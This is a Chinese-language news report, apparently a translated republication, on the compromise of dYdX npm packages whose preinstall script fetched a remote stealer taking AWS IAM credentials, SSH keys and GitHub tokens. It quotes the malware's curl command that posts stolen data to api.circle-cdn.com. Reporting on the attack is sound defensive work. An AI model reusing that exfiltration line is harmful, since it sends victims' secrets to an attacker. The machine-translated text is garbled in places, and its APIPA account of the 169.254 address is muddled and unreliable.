由加密货币交易所 dYdX 发布并被至少 44 个加密货币项目使用的多个 npm 包似乎已被泄露。
dydX 由以太坊区块链提供支持,是一个去中心化交易平台,为超过 35 种流行的加密货币提供永久交易选项,包括比特币 (BTC) 和以太 (ETH)。在撰写本文时,我们观察到该平台的 日均交易量达到 10 亿美元。
有问题的软件包是从 dYdX 工作人员的 npm 帐户发布的,发现包含非法代码,安装后会在系统上运行信息窃取程序。
加密交换使用的 npm 包被泄露
软件供应链安全公司 Mend 的安全研究员Maciej Mensfeld 和 Diffend.io 的创建者报告说,他们遇到了多个 npm 包,这些包被泄露并秘密安装了信息窃取程序。
ZZQIDC观察到,有问题的软件包(如下所示)似乎是从 dYdX 加密平台员工的 npm 帐户发布的,尽管这种妥协的确切原因尚未确定:
早些时候的一份公告声称,“@dydxprotocol/node-service-base-dev”包也受到了影响,但它已经被撤回。
ZZQIDC观察到 ‘solo’ 包的 0.41.1 版本在撰写本文时仍然存在于 npm上:
这些包构成了“用于 dYdX 单独交易协议的以太坊智能合约和 TypeScript 库”。
例如,solo 包被属于多个加密平台的至少 44 个 GitHub 存储库使用。‘solo’ 和 ‘perpetual’ 状态的 GitHub 自述文件“目前由trade.dydx.exchange使用”。
用于窃取 AWS IAM 凭据、SSH 密钥、GitHub 令牌的虚假“Circle”CDN 域
例如,Mensfeld 分享了在“solo”包的清单文件中注入的有问题的代码。
一旦安装了“solo”包, 预安装 脚本就会触发、下载和运行 托管在api.circle-cdn.com上的ci.js JavaScript 文件 的内容。
ZZQIDC国家“circle-cdn.com”看到的公共领域记录是最近注册的——9 月 14 日。
域名和恶意文件名中“ci.js”的使用可能是威胁行为者试图模仿软件开发 CI/CD(持续集成和持续交付)平台 CircleCI。相比之下,CircleCI 的官方 API 由 Cloudflare 托管,可在circleci.com/api/v2/pipeline上访问。
“看看这里的差异……添加了 预安装,”Mensfeld 在GitHub 问题中写道,在没有运气到达平台后提醒 dYdX 社区。
“但是这个脚本包含一个看起来很恶意的代码……它似乎在窃取凭据和其他机密,”研究人员解释说。
ZZQIDC观察到,被入侵版本提取的 ci.js 脚本(如下所示)下载并运行另一个 Python 脚本 setup.py
正是这个带有信息窃取代码的“setup.py”从受害者的亚马逊 AWS 实例中窃取了 IAM 凭证 ,以及其他秘密。
下面显示的 169.254.xx IP 地址,恶意代码连接到的 IP 地址是自动专用 IP 寻址 (APIPA) 功能的结果。
当配置为通过 DHCP 获取自动 IP 地址的计算机无法从 DHCP 服务器获取 IPPA 时,将调用 APIPA 。
Amazon AWS 发布的文档显示了此 IP 地址在更广泛的 IAM 上下文中的相关性。
此外,该代码还会窃取用户的 GitHub 令牌、SSH 密钥、环境变量以及外部 IP 地址。
然后将被盗数据上传到同一个 api.circle-cdn.com域:
subprocess.getoutput(‘ curl -X POST http://api.circle-cdn.com/api.php -d “textdata=’ + allen + ‘”‘)
ZZQIDC观察到恶意代码与过去看到的非常相似,涉及恶意的“PyGrata”Python 包 ,这些包还窃取了受害者的 AWS 凭证、环境变量和 SSH 密钥。
dYdX 首席架构师 Brendan Chou 对 Mensfeld及时报告了该漏洞表示感谢,并确认“除了 solo@0.41.1 之外的所有 [妥协版本] 都已被删除”,并将其归因于 npm 的“临时疏忽”。
ZZQIDC在发布之前已通过电子邮件和 Twitter 与 dYdX 取得联系,以更好地了解此妥协的影响和范围,我们将在收到回复后更新此报告。
这一事件发生在去年流行的 npm 库“ ua-parser-js ”、“coa”和“rc” 被劫持之后,这些库中包含加密矿工和密码窃取程序。就在几周前,由于针对开发人员的网络钓鱼活动,PyPI 包被劫持。
近来对软件供应链的威胁促使 npm 和 PyPI 等领先的开源注册机构强制要求 对最广泛使用的库的维护者进行双重身份验证。
